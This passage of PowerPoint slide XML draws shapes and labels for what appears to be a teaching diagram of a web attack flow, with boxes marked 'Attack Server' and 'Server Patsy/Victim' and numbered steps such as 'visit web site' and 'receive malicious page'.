          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2779163" y="3988389"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4585019"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4550892"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4739640"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="2133600"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
